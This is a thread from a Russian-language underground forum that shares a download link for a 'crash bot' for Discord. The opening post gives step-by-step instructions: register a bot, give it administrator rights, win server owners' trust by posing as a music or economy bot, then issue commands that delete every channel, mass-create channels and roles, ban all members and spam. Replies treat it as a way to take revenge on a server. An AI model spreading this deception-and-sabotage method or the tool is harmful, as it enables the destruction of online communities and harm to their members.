• Добро пожаловать в Пиратскую Бухту! Чтобы получить полный доступ к форуму пройдите регистрацию!
  • В связи с обновление ПО у нашего провайдера возможны перебои с доступностью к сайту 10.07.2020, с 05:00 до 07:00 МСК

Слив Краш бот Discord

valenzua

Боцман
Местный
Онлайн
10д 23ч 40м
Сделки
0
Нарушения
2 / 1
Прикол в том, что ты создаешь бота, пришиваешь специальную программу к нему, и можешь крашить сервера, путем втирания в доверие и приглашение бота на сервер.

Скачать: http://www.mediafire.com/file/m04y0...D1%80%D0%B0%D1%88_%D0%B1%D0%BE%D1%82.rar/file
VT: VirusTotal

1. Создаёте бота на discordapp.com/developers
2. После создания, берете токен, и в текстовый документ bot_token.txt - вставляете токен бота.
3. Дальше, создаёте ссылку-приглашение бота на сервер с правами администратора (8)
4. Открываете саму программу.
5. Втираетесь в доверие, якобы это музыкальный бот/экономи, все равно, главное - чтобы его добавили на сервер
6. После добавления, чекайте текстовый документ - "Команды.txt", и вписывайте в любой чат.

Там есть такие команды как: уничтожить все каналы, создать 1-99999 каналов с любым названием, создать кучу ролей с любым названием, забанить кого-либо/всех участников сервера, спамить во все каналы сервера и т.д

П.С ВСЕ ПРОВЕРЯЙТЕ!!

artishock46

Пират
Разведка
Онлайн
13д 1ч 52м
Сделки
2
Нарушения
0 / 0
Ахах, прикольная фича...
как то меня забанили на одном серваке типа читак (хотя я исключительно за честный гемплей)...
можно будет попробовать сделать мстю..
надо опробовать

valenzua

Боцман
Местный
Онлайн
10д 23ч 40м
Сделки
0
Нарушения
2 / 1
Ахах, прикольная фича...
как то меня забанили на одном серваке типа читак (хотя я исключительно за честный гемплей)...
можно будет попробовать сделать мстю..
Хах , ну попробуй))
Удачки

TaFhU

Мичман
Premium +
Онлайн
17д 2ч 10м
Сделки
0
Нарушения
0 / 0
Забанив всех на канале, права переходят тебе ?) так каналы пиздить можно или нет

Amework

Гардемарин
Местный
Онлайн
1д 19ч 55м
Сделки
0
Нарушения
0 / 0
Забанив всех на канале, права переходят тебе ?) так каналы пиздить можно или нет
Нет. Во первых это трудо реализовать (что бы добавить бота на сервер тебе необходимо иметь права администратора этого сервера или, как минимум, попросить администратора сервера добавить этого сомнительного бота). Даже если у тебя это получится, то сервер ты забрать себе не сможешь в любом случае.

Сверху